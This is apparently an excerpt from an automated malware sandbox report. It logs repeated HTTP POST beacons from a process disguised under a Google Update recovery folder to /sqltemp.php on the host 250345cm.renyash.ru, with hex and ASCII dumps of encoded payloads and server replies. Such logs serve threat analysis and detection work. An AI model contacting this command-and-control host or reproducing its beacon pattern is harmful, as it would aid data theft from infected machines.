                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 1d 2a 3d 2a 1e 31 0c 2f 03 3c 04 27 53 31 00 04 11 3c 06 31 05 24 2d 33 59 2a 3a 20 02 36 3c 2e 07 31 01 23 07 21 2e 2f 59 33 1e 2b 59 05 1c 20 43 22 3c 3f 01 3d 2e 24 01 27 3f 2e 04 27 00 24 5f 2a 2b 20 53 23 3b 20 06 26 2e 37 02 3e 3a 3c 53 27 02 33 5c 39 3f 29 1f 33 00 2c 54 00 11 26 1c 27 08 23 01 37 09 30 5d 21 1f 21 13 26 42 2a 50 26 12 0d 52 23 17 22 59 31 31 3f 13 21 23 3a 5e 32 3b 39 5c 23 3e 33 52 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%*=*1/<'S1<1$-3Y*: 6<.1#!./Y3+Y C"<?=.$'?.'$_*+ S#; &.7>:<S'3\9?)3,T&'#70]!!&B*P&R#"Y11?!#:^2;9\#>3R=>%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  74192.168.2.662710104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:08.085648060 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:08.438534021 CET1124OUTData Raw: 53 55 5f 53 54 59 54 53 58 56 52 59 56 5a 59 56 5b 5d 54 5c 55 5b 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SU_STYTSXVRYVZYV[]T\U[P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3,!Y4.'>#B8:!=Z?7(-'!"/?+&4,*&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:08.537785053 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:08.802113056 CET814INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:08 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jl2937dxx24%2FC3Wjk8bqcVIzGFGMFaOxfRHhMgLpjvw9bHK1aV%2F1MLWt3NBcXHeNbWK%2B%2BDQZg6xmykkaM%2BUPgezeV%2FS7Gc3lMNi3C4vvsAanv9KpMTo3z%2Fqspugnd7a9VkpLirHo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364f61b2cc336-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=11981&min_rtt=6291&rtt_var=13740&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28176&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  75192.168.2.662711104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:08.941576004 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:09.297864914 CET1124OUTData Raw: 56 54 5a 53 54 59 54 5d 58 56 52 59 56 50 59 53 5b 5c 54 5f 55 5f 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VTZSTYT]XVRYVPYS[\T_U_PTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S._3/5\ Y.$X+C/=R4-+)*.?#2?Y?(&&$.*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:09.393985033 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:09.599112034 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILfkweiiuQtB4PbpxJIpaovcx2oplJ%2BJyWpmDU03r%2FFqusOtGniP%2BLhUSjaoIMy%2FMkncF5BGgEwFn8VqTqkx4Vny9n%2FjOhL5Fc9gqDHaflKyfx%2B%2B7ESs2uwIItatjUFPVTtcXQyZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb364fb6aa84373-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=6580&min_rtt=1646&rtt_var=10485&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=35506&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  76192.168.2.662712104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:09.724282980 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1120
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:10.079206944 CET1120OUTData Raw: 56 51 5a 56 51 5f 51 52 58 56 52 59 56 59 59 5f 5b 52 54 5e 55 59 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZVQ_QRXVRYVYY_[RT^UYPXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3,!Z#=3 /T ()3R>871(+%D2<+R-*&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:10.163470030 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:10.347675085 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:10 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P90SiuH51xrS2dCqdnmeH9SsMHbK6RO9%2BCA8kdYjC0%2FEBULc6yp%2BZvlrxIozn8jc6yL7LK2QBTd5KYMwQQSuFNcpL%2FIVkSi%2B1%2FoBnU2hMAFpgVVYo9I3IQTEqv%2BT9BPdlrWMuVO3"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36500398cc3f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2367&min_rtt=1498&rtt_var=2300&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1422&delivery_rate=172740&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  77192.168.2.662713104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:10.474524975 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:10.834270000 CET1124OUTData Raw: 56 53 5f 52 54 5f 54 51 58 56 52 59 56 5a 59 53 5b 5d 54 51 55 5e 50 5d 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VS_RT_TQXVRYVZYS[]TQU^P]Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.[0:7?9_0.)!#8^?=+ 24++&$.:&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:10.919001102 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:11.100461960 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=btWqKQ7iG5BPC%2BdvtxAXAbVZFmZE3Dj8jXcX6qaNbF66wJjvPh51qJyXZbrvTnNfUKw7nWTS4P97tLuDADCLaC3A6Ak%2BJnrmkDvhHwXLudHTvED2zYljCjE9h4PV9wrmyTjLL3tZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36504faaf43b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2780&min_rtt=1883&rtt_var=2501&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=161076&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  78192.168.2.662714104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:11.235477924 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:11.594842911 CET1124OUTData Raw: 56 55 5f 52 51 5b 54 52 58 56 52 59 56 50 59 57 5b 5e 54 51 55 55 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VU_RQ[TRXVRYVPYW[^TQUUPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.0!X4<1^'(.)-V7+;)>4Z4?Z?;!&/R:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:11.687906027 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:11.952198982 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:11 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LfKbPG4T5AvmP7h5bVi34iWMC8wCubuxRe0Ps4Ag59p1Uh6%2Bg%2FOaCaeD2WQBEJQKEKQ90XDZN4p5zxn2WLcBiY6cyGHbIgk9O%2B8HGNKg1x7DuenvNjRc2fz0rSrPCa%2BxiI9xuOb"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36509cec8c3fa-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1481&rtt_var=731&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=668804&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  79192.168.2.662715104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:12.080233097 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:12.438463926 CET1124OUTData Raw: 56 51 5a 50 54 5c 54 56 58 56 52 59 56 50 59 54 5b 53 54 50 55 59 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQZPT\TVXVRYVPYT[STPUYP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3-X4-Y%.;9=R4/<<)/7<$?:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:12.542864084 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:12.718910933 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ikhhOzacAb7OZqwRWGy%2FsWeejtdu5n6zL5ClgdZFO%2FqTLlF9JZUK4MAeeEPmRH7UGxUXvMZyzXocVgc0lyOq%2FyjHODQXaTqid7a7hTjCPGcYoHmgfLDtXb93eVA7xfiiQMFbDzd"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3650f1a54de95-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7587&min_rtt=1463&rtt_var=12797&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=28935&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a
                                                                                                                  Data Ascii: 42W\X
                                                                                                                  Jan 1, 2025 16:03:12.799307108 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  80192.168.2.662716104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:12.935436010 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:13.284388065 CET1124OUTData Raw: 53 54 5f 53 54 5a 51 51 58 56 52 59 56 5c 59 5e 5b 5f 54 59 55 54 50 54 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: ST_STZQQXVRYV\Y^[_TYUTPTZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-09[ '='B;*!R7<<7*$#" (+)%'W.&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:13.379698992 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  81192.168.2.662717104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:13.623900890 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:13.969852924 CET1964OUTData Raw: 53 50 5a 51 54 5b 54 5c 58 56 52 59 56 5a 59 55 5b 58 54 5a 55 5a 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SPZQT[T\XVRYVZYU[XTZUZPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-3/%\ <2'.3C/1U -;(:$*4 (?+A$<(::&Y.,Y--
                                                                                                                  Jan 1, 2025 16:03:14.067747116 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:14.337053061 CET956INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6RypVyT5Tc%2Bilk0T5sAbi2Ek1Ei%2FvjN0rwaeDLZYI5LQkKcu6gYwIv9r7wifkArwXhW95K%2FmNeMT9MetH1zHM8TjsWuVr611xf4kg8mht2DCo6NINwmZBrcCw9A6%2BenXJdQPl4ZG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36518a8b30f49-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8040&min_rtt=1662&rtt_var=13380&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=27708&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 50 29 5b 21 09 26 0c 20 1e 2a 3e 27 53 27 2e 0c 10 28 5e 32 5f 30 00 0d 10 29 5f 2f 58 22 12 2d 5f 31 28 0e 58 20 3e 38 02 30 34 2b 59 05 1c 20 43 36 06 3c 59 3d 04 2f 5d 32 3f 26 00 27 07 24 5c 3c 38 37 0a 23 02 3f 1d 33 3d 37 02 29 2a 30 54 27 2f 3c 03 2e 01 3e 0e 33 00 2c 54 00 11 26 57 24 1f 19 00 37 09 3c 59 22 21 22 01 25 42 2d 0a 32 12 27 50 23 39 21 07 31 1c 09 59 21 23 08 5a 26 05 0b 11 34 3d 23 19 2a 2e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%P)[!& *>'S'.(^2_0)_/X"-_1(X >804+Y C6<Y=/]2?&'$\<87#?3=7)*0T'/<.>3,T&W$7<Y"!"%B-2'P#9!1Y!#Z&4=#*.%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  82192.168.2.662718104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:13.768203974 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:14.126076937 CET1124OUTData Raw: 56 5f 5a 57 54 5f 51 56 58 56 52 59 56 58 59 53 5b 5e 54 5b 55 59 50 59 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V_ZWT_QVXVRYVXYS[^T[UYPYZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.X'?%"/)$X(;*=#?((>=?#$(=E28:&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:03:14.213042021 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:14.480444908 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfGELreOEoHwf6YF1KF2mLrbMF4Li%2FpjxF8amBQqT%2FGZXgDEj8XuNDahZ1Jrp82CrZ124b6GFxS1eCJ9xWuLnNB%2BVzwR%2FZzZs9bqOERtU%2F84llT%2FfvE6kb54vqMHi3qaIJkTELUn"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb365198c6a8cc8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
